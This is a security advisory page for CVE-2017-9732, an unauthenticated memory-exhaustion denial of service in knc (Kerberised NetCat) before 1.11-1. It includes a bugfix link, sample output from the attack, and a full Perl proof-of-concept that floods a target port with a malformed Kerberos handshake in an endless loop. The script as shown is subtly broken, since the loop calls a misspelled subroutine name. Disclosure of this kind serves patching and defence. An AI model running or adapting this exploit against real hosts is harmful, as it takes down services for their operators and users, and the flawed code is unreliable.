what you don't know can hurt you

knc (Kerberized NetCat) Denial Of Service

knc (Kerberized NetCat) Denial Of Service
Posted Nov 29, 2018
Authored by Imre Rad

knc (Kerberised NetCat) versions before 1.11-1 are vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another service running on the targeted host. Proof of concept included.

tags | exploit, denial of service, proof of concept
advisories | CVE-2017-9732
MD5 | ae47c891e14b49e09ebf721184f792e1

knc (Kerberized NetCat) Denial Of Service

Change Mirror Download
# Product
"KNC is Kerberised NetCat. It works in basically the same way as either netcat or stunnel except that it is uses GSS-API to secure the communication. You can use it to construct client/server applications while keeping the Kerberos libraries out of your programs address space quickly and easily."

## Links
Official page:
http://oskt.secure-endpoints.com/knc.html
Source code repository:
https://github.com/elric1/knc/

## CVE-2017-9732 vulnerability
knc (Kerberised NetCat) before 1.11-1 is vulnerable to denial of service (memory exhaustion) that can be exploited remotely without authentication, possibly affecting another services running on the targeted host.

The knc implementation uses a temporary buffer in read_packet() function that is not freed (memory leak). An unauthenticated attacker can abuse this by sending a blob of valid kerberos handshake structure but with unexpected type; instead of token type AP_REQ (0x0100) I sent 0x0000 at bytes 16 and 17 in my proof of concept. During the attack, gss_sec_accept_context returns G_CONTINUE_NEEDED and the memory is exhausted in the long run.

The attack might not even be logged, depending on how the Open Source Kerberos Tooling stack is configured.

## Exploit

```
./memory-exhaustion-poc.pl target-host target-port
```

Top output ~30 seconds later:

```
2 CPUs; last pid: 20507; load averages: 1.26, 0.84, 0.38 14:11:53

268 processes: 4 running, 264 sleeping

CPU states: 38.6% user, 0.0% nice, 27.1% system, 34.3% idle

cpu 0: 18.7% user, 0.0% nice, 22.9% system, 58.4% idle

cpu 1: 54.7% user, 0.0% nice, 30.7% system, 14.6% idle

Memory: 7857M real, 7734M used, 122M free Swap: 4094M total, 0K used, 4094M free



PID PSID USERNAME THR PRI NICE SIZE RES STATE TIME CPU COMMAND

20156 19806 username 1 20 0 2165M 2133M cpu1 19:41 46.19% knc
...
```



## Bugfix
https://github.com/elric1/knc/commit/f237f3e09ecbaf59c897f5046538a7b1a3fa40c1


## Proof of concept
# memory-exhaustion-poc.pl

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket::INET;

my $host = shift @ARGV || "127.0.0.1";
my $port = shift @ARGV || 2666;

my $sock = IO::Socket::INET->new(PeerPort => $port, PeerAddr => $host) or die "Cant connect: $@\n";
$sock->autoflush();

my $data = pack("H*", without_spaces("
60 82 02 32 06 09 2a 86 48 86 f7 12 01 02 02 00
00 6e 82 02 21 30 82 02 1d a0 03 02 01 05 a1 03
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00
"));

while(1){
send_with_lenght_prefix($data);
}

sub send_with_length_prefix {
my $d = shift;
do_send(pack("N", length($d)));
do_send($d);
}

sub do_send {
my $d = shift;
printf STDERR ">> %s\n", unpack("H*", $d);
print $sock $d or die "Cant write: $!";
}

sub without_spaces {
my $d = shift;
$d =~ s/\s*//g;
return $d;
}
Login or Register to add favorites

File Archive:

July 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    15 Files
  • 2
    Jul 2nd
    19 Files
  • 3
    Jul 3rd
    12 Files
  • 4
    Jul 4th
    1 Files
  • 5
    Jul 5th
    2 Files
  • 6
    Jul 6th
    25 Files
  • 7
    Jul 7th
    35 Files
  • 8
    Jul 8th
    4 Files
  • 9
    Jul 9th
    9 Files
  • 10
    Jul 10th
    7 Files
  • 11
    Jul 11th
    0 Files
  • 12
    Jul 12th
    0 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close